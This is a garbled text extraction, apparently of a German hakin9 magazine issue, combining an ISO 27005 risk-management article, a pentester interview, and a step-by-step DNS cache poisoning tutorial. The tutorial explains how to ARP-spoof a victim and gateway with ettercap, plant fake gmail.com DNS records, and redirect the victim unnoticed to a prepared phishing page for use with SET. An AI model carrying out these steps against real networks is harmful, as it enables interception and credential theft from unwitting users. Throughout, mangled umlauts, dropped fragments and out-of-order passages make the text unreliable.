Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
